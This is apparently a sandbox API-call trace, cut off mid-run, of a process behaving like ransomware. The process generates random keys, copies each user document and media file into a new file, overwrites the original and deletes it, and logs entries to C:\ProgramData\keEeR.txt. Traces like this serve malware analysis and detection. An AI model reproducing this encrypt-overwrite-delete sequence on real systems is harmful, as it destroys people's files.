[0300.438] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0300.441] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0300.441] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766010 | out: pbBuffer=0x12766010) returned 1 [0300.441] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0300.441] WriteFile (in: hFile=0x218, lpBuffer=0x12719000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12621d78, lpOverlapped=0x0 | out: lpBuffer=0x12719000*, lpNumberOfBytesWritten=0x12621d78*=0x80, lpOverlapped=0x0) returned 1 [0300.444] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x0 [0300.446] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb30, ulCount=0x10, ulNumEntriesRemoved=0x331efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb30, ulNumEntriesRemoved=0x331efb10) returned 0 [0300.446] SetEvent (hEvent=0x150) returned 1 [0300.446] SetEvent (hEvent=0x1b8) returned 1 [0300.446] SetEvent (hEvent=0x104) returned 1 [0300.446] ReadFile (in: hFile=0x1e0, lpBuffer=0x13338000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12621d68, lpOverlapped=0x0 | out: lpBuffer=0x13338000*, lpNumberOfBytesRead=0x12621d68*=0x2383, lpOverlapped=0x0) returned 1 [0300.448] WriteFile (in: hFile=0x218, lpBuffer=0x13338000*, nNumberOfBytesToWrite=0x2383, lpNumberOfBytesWritten=0x12621d74, lpOverlapped=0x0 | out: lpBuffer=0x13338000*, lpNumberOfBytesWritten=0x12621d74*=0x2383, lpOverlapped=0x0) returned 1 [0300.497] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0300.666] SetEvent (hEvent=0x150) returned 1 [0300.666] SetEvent (hEvent=0x20c) returned 1 [0300.666] ReadFile (in: hFile=0x1e0, lpBuffer=0x13338000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12621d68, lpOverlapped=0x0 | out: lpBuffer=0x13338000*, lpNumberOfBytesRead=0x12621d68*=0x0, lpOverlapped=0x0) returned 1 [0300.669] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0301.531] CloseHandle (hObject=0x218) returned 1 [0301.533] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0302.069] SetEvent (hEvent=0x20c) returned 1 [0302.069] CloseHandle (hObject=0x1e0) returned 1 [0302.069] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0302.541] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0302.541] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12621e94 | out: lpMode=0x12621e94) returned 0 [0302.541] WriteFile (in: hFile=0x1c8, lpBuffer=0x12348240*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x12621e64, lpOverlapped=0x0 | out: lpBuffer=0x12348240*, lpNumberOfBytesWritten=0x12621e64*=0x30, lpOverlapped=0x0) returned 1 [0302.541] CloseHandle (hObject=0x1c8) returned 1 [0302.543] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\XxX9zS.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xxx9zs.ods")) returned 1 [0302.684] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x0 [0302.686] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb30, ulCount=0x10, ulNumEntriesRemoved=0x331efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb30, ulNumEntriesRemoved=0x331efb10) returned 0 [0302.686] SetEvent (hEvent=0x150) returned 1 [0302.686] SetEvent (hEvent=0x1dc) returned 1 [0302.686] SetEvent (hEvent=0x1f0) returned 1 [0302.686] SetEvent (hEvent=0x1b8) returned 1 [0302.689] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0302.699] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0302.699] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x0 [0302.700] SetEvent (hEvent=0x198) returned 1 [0302.700] SetEvent (hEvent=0x21c) returned 1 [0302.700] SetEvent (hEvent=0x1b8) returned 1 [0302.700] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0302.701] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb34, ulCount=0x10, ulNumEntriesRemoved=0x331efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb34, ulNumEntriesRemoved=0x331efb14) returned 0 [0302.701] SetEvent (hEvent=0x1b8) returned 1 [0302.701] SetEvent (hEvent=0x21c) returned 1 [0302.727] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\XxX9zS.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xxx9zs.ods"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0302.730] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x12623e88 | out: lpMode=0x12623e88) returned 0 [0302.730] WriteFile (in: hFile=0x218, lpBuffer=0x127d0000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12623e78, lpOverlapped=0x0 | out: lpBuffer=0x127d0000*, lpNumberOfBytesWritten=0x12623e78*=0xfa000, lpOverlapped=0x0) returned 1 [0302.786] CloseHandle (hObject=0x218) returned 1 [0303.064] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0303.770] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0303.772] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0303.786] SetEvent (hEvent=0x1f0) returned 1 [0303.786] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0303.819] SetEvent (hEvent=0x214) returned 1 [0303.820] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0303.825] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0303.825] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0303.828] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0303.828] SetEvent (hEvent=0x198) returned 1 [0303.828] SetEvent (hEvent=0x214) returned 1 [0303.828] SetEvent (hEvent=0x12c) returned 1 [0303.828] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0303.829] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb34, ulCount=0x10, ulNumEntriesRemoved=0x331efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb34, ulNumEntriesRemoved=0x331efb14) returned 0 [0303.829] SetEvent (hEvent=0x150) returned 1 [0303.829] SetEvent (hEvent=0x198) returned 1 [0303.829] SetEvent (hEvent=0x214) returned 1 [0303.829] SetEvent (hEvent=0x12c) returned 1 [0303.829] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390020 | out: pbBuffer=0x12390020) returned 1 [0303.829] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392020 | out: pbBuffer=0x12392020) returned 1 [0303.829] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0303.830] WriteFile (in: hFile=0x1b0, lpBuffer=0x1266f000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12625d78, lpOverlapped=0x0 | out: lpBuffer=0x1266f000*, lpNumberOfBytesWritten=0x12625d78*=0x80, lpOverlapped=0x0) returned 1 [0303.836] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0303.840] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0303.840] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb30, ulCount=0x10, ulNumEntriesRemoved=0x331efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb30, ulNumEntriesRemoved=0x331efb10) returned 0 [0303.840] SetEvent (hEvent=0x198) returned 1 [0303.840] SetEvent (hEvent=0x214) returned 1 [0303.840] SetEvent (hEvent=0x12c) returned 1 [0303.840] ReadFile (in: hFile=0x188, lpBuffer=0x13948000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12625d68, lpOverlapped=0x0 | out: lpBuffer=0x13948000*, lpNumberOfBytesRead=0x12625d68*=0x14721, lpOverlapped=0x0) returned 1 [0303.845] WriteFile (in: hFile=0x1b0, lpBuffer=0x13948000*, nNumberOfBytesToWrite=0x14721, lpNumberOfBytesWritten=0x12625d74, lpOverlapped=0x0 | out: lpBuffer=0x13948000*, lpNumberOfBytesWritten=0x12625d74*=0x14721, lpOverlapped=0x0) returned 1 [0303.851] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0303.917] ReadFile (in: hFile=0x188, lpBuffer=0x13948000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12625d68, lpOverlapped=0x0 | out: lpBuffer=0x13948000*, lpNumberOfBytesRead=0x12625d68*=0x0, lpOverlapped=0x0) returned 1 [0303.917] CloseHandle (hObject=0x1b0) returned 1 [0303.930] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0304.138] CloseHandle (hObject=0x188) returned 1 [0304.138] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0304.138] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x12625e94 | out: lpMode=0x12625e94) returned 0 [0304.139] WriteFile (in: hFile=0x188, lpBuffer=0x125ec0f0*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x12625e64, lpOverlapped=0x0 | out: lpBuffer=0x125ec0f0*, lpNumberOfBytesWritten=0x12625e64*=0x49, lpOverlapped=0x0) returned 1 [0304.139] CloseHandle (hObject=0x188) returned 1 [0304.141] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\8BJrk8.pps" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\8bjrk8.pps")) returned 1 [0304.153] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0304.303] SetEvent (hEvent=0x214) returned 1 [0304.303] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0304.331] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0304.336] SetEvent (hEvent=0x22c) returned 1 [0304.336] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0304.413] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\6wvQVTWOr1.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\6wvqvtwor1.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0304.655] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0304.660] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x124a0e88 | out: lpMode=0x124a0e88) returned 0 [0304.660] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0304.719] SetEvent (hEvent=0x12c) returned 1 [0304.719] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0304.733] SetEvent (hEvent=0x1f0) returned 1 [0304.733] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0304.735] SetEvent (hEvent=0x21c) returned 1 [0304.735] SetEvent (hEvent=0x190) returned 1 [0304.735] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0304.762] SetEvent (hEvent=0x21c) returned 1 [0304.762] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0304.771] SetEvent (hEvent=0x1ac) returned 1 [0304.771] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0305.023] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0305.069] WriteFile (in: hFile=0x208, lpBuffer=0x15cf2000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124a0e78, lpOverlapped=0x0 | out: lpBuffer=0x15cf2000*, lpNumberOfBytesWritten=0x124a0e78*=0xfa000, lpOverlapped=0x0) returned 1 [0305.093] CloseHandle (hObject=0x208) returned 1 [0305.190] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\6wvQVTWOr1.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\6wvqvtwor1.doc")) returned 1 [0305.424] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0305.797] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0305.813] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0305.815] SetEvent (hEvent=0x214) returned 1 [0305.815] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0305.831] SetEvent (hEvent=0x1e8) returned 1 [0305.831] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc0a0 | out: pbBuffer=0x125fc0a0) returned 1 [0305.831] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8070 | out: pbBuffer=0x124a8070) returned 1 [0305.831] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c281 | out: pbBuffer=0x1237c281) returned 1 [0305.831] WriteFile (in: hFile=0x1e0, lpBuffer=0x12723000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a3d78, lpOverlapped=0x0 | out: lpBuffer=0x12723000*, lpNumberOfBytesWritten=0x123a3d78*=0x80, lpOverlapped=0x0) returned 1 [0305.833] SetEvent (hEvent=0x104) returned 1 [0305.833] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0305.858] SetEvent (hEvent=0x1e8) returned 1 [0305.858] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0305.898] SetEvent (hEvent=0x20c) returned 1 [0305.899] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0306.035] SetEvent (hEvent=0x1dc) returned 1 [0306.035] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0306.048] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0306.056] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0306.056] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb30, ulCount=0x10, ulNumEntriesRemoved=0x331efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb30, ulNumEntriesRemoved=0x331efb10) returned 0 [0306.056] SetEvent (hEvent=0x150) returned 1 [0306.056] SetEvent (hEvent=0x1e8) returned 1 [0306.056] SetEvent (hEvent=0x22c) returned 1 [0306.056] SetEvent (hEvent=0x12c) returned 1 [0306.056] ReadFile (in: hFile=0x1f4, lpBuffer=0x14dde000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x14dde000*, lpNumberOfBytesRead=0x123a3d68*=0x2eb2, lpOverlapped=0x0) returned 1 [0306.057] WriteFile (in: hFile=0x1e0, lpBuffer=0x14dde000*, nNumberOfBytesToWrite=0x2eb2, lpNumberOfBytesWritten=0x123a3d74, lpOverlapped=0x0 | out: lpBuffer=0x14dde000*, lpNumberOfBytesWritten=0x123a3d74*=0x2eb2, lpOverlapped=0x0) returned 1 [0306.062] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0306.226] SetEvent (hEvent=0x1f0) returned 1 [0306.226] ReadFile (in: hFile=0x1f4, lpBuffer=0x14dde000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x14dde000*, lpNumberOfBytesRead=0x123a3d68*=0x0, lpOverlapped=0x0) returned 1 [0306.226] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0306.237] SetEvent (hEvent=0x1f0) returned 1 [0306.237] CloseHandle (hObject=0x1e0) returned 1 [0306.254] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0306.463] CloseHandle (hObject=0x1f4) returned 1 [0306.464] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0306.464] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x123a3e94 | out: lpMode=0x123a3e94) returned 0 [0306.464] WriteFile (in: hFile=0x1f4, lpBuffer=0x12352140*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x123a3e64, lpOverlapped=0x0 | out: lpBuffer=0x12352140*, lpNumberOfBytesWritten=0x123a3e64*=0x4b, lpOverlapped=0x0) returned 1 [0306.465] CloseHandle (hObject=0x1f4) returned 1 [0306.466] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\aLqbOAns.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\alqboans.odp")) returned 1 [0306.472] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0306.940] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0306.977] SetEvent (hEvent=0x1dc) returned 1 [0306.977] SetEvent (hEvent=0x22c) returned 1 [0306.977] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0307.496] WriteFile (in: hFile=0x230, lpBuffer=0x153d8000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124a1e78, lpOverlapped=0x0 | out: lpBuffer=0x153d8000*, lpNumberOfBytesWritten=0x124a1e78*=0xfa000, lpOverlapped=0x0) returned 1 [0307.527] CloseHandle (hObject=0x230) returned 1 [0307.564] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0307.785] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\eo3LI.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\eo3li.docx")) returned 1 [0307.874] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0308.176] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0308.178] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0308.184] SetEvent (hEvent=0x1b8) returned 1 [0308.184] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0308.355] SetEvent (hEvent=0x1e8) returned 1 [0308.355] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0308.545] SetEvent (hEvent=0x190) returned 1 [0308.545] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0308.551] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0308.552] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0308.553] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0308.553] SetEvent (hEvent=0x190) returned 1 [0308.553] SetEvent (hEvent=0x220) returned 1 [0308.553] SetEvent (hEvent=0x198) returned 1 [0308.553] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0308.564] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb34, ulCount=0x10, ulNumEntriesRemoved=0x331efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb34, ulNumEntriesRemoved=0x331efb14) returned 0 [0308.564] SetEvent (hEvent=0x150) returned 1 [0308.564] SetEvent (hEvent=0x198) returned 1 [0308.564] SetEvent (hEvent=0x1ac) returned 1 [0308.564] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0308.615] SetEvent (hEvent=0x22c) returned 1 [0308.615] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0308.704] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\92 o.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\92 o.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0309.387] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0309.414] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x1276be88 | out: lpMode=0x1276be88) returned 0 [0309.414] SetEvent (hEvent=0x104) returned 1 [0309.414] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0309.416] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0309.428] SetEvent (hEvent=0x14c) returned 1 [0309.428] SetEvent (hEvent=0x214) returned 1 [0309.428] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0309.514] SetEvent (hEvent=0x1e8) returned 1 [0309.514] SetEvent (hEvent=0x190) returned 1 [0309.515] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0309.631] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390240 | out: pbBuffer=0x12390240) returned 1 [0309.631] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392000 | out: pbBuffer=0x12392000) returned 1 [0309.631] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714201 | out: pbBuffer=0x12714201) returned 1 [0309.631] WriteFile (in: hFile=0x180, lpBuffer=0x1266f000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e3d78, lpOverlapped=0x0 | out: lpBuffer=0x1266f000*, lpNumberOfBytesWritten=0x125e3d78*=0x80, lpOverlapped=0x0) returned 1 [0309.636] ReadFile (in: hFile=0x1b0, lpBuffer=0x15986000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x15986000*, lpNumberOfBytesRead=0x125e3d68*=0x6638, lpOverlapped=0x0) returned 1 [0309.638] WriteFile (in: hFile=0x180, lpBuffer=0x15986000*, nNumberOfBytesToWrite=0x6638, lpNumberOfBytesWritten=0x125e3d74, lpOverlapped=0x0 | out: lpBuffer=0x15986000*, lpNumberOfBytesWritten=0x125e3d74*=0x6638, lpOverlapped=0x0) returned 1 [0309.642] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0310.218] ReadFile (in: hFile=0x1b0, lpBuffer=0x15986000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x15986000*, lpNumberOfBytesRead=0x125e3d68*=0x0, lpOverlapped=0x0) returned 1 [0310.308] CloseHandle (hObject=0x180) returned 1 [0310.312] CloseHandle (hObject=0x1b0) returned 1 [0310.312] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0310.312] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x125e3e94 | out: lpMode=0x125e3e94) returned 0 [0310.312] WriteFile (in: hFile=0x1b0, lpBuffer=0x125ee0c0*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x125e3e64, lpOverlapped=0x0 | out: lpBuffer=0x125ee0c0*, lpNumberOfBytesWritten=0x125e3e64*=0x59, lpOverlapped=0x0) returned 1 [0310.313] CloseHandle (hObject=0x1b0) returned 1 [0310.313] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\6GLhCUHar.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\6glhcuhar.mp3")) returned 1 [0310.635] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0310.768] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0310.770] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0310.934] SetEvent (hEvent=0x190) returned 1 [0310.939] SetEvent (hEvent=0x1f0) returned 1 [0310.939] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0311.432] SetEvent (hEvent=0x21c) returned 1 [0311.432] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0311.465] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0311.465] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0311.470] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0311.470] SetEvent (hEvent=0x198) returned 1 [0311.470] SetEvent (hEvent=0x21c) returned 1 [0311.470] SetEvent (hEvent=0x220) returned 1 [0311.470] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0311.473] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb34, ulCount=0x10, ulNumEntriesRemoved=0x331efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb34, ulNumEntriesRemoved=0x331efb14) returned 0 [0311.473] SetEvent (hEvent=0x150) returned 1 [0311.473] SetEvent (hEvent=0x21c) returned 1 [0311.473] SetEvent (hEvent=0x220) returned 1 [0311.473] SetEvent (hEvent=0x198) returned 1 [0311.505] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\yjOkz_fxpa.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\yjokz_fxpa.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0311.828] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0312.409] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x123a1e88 | out: lpMode=0x123a1e88) returned 0 [0312.409] SetEvent (hEvent=0x198) returned 1 [0312.409] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0312.425] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0312.427] SetEvent (hEvent=0x14c) returned 1 [0312.427] SetEvent (hEvent=0x1b8) returned 1 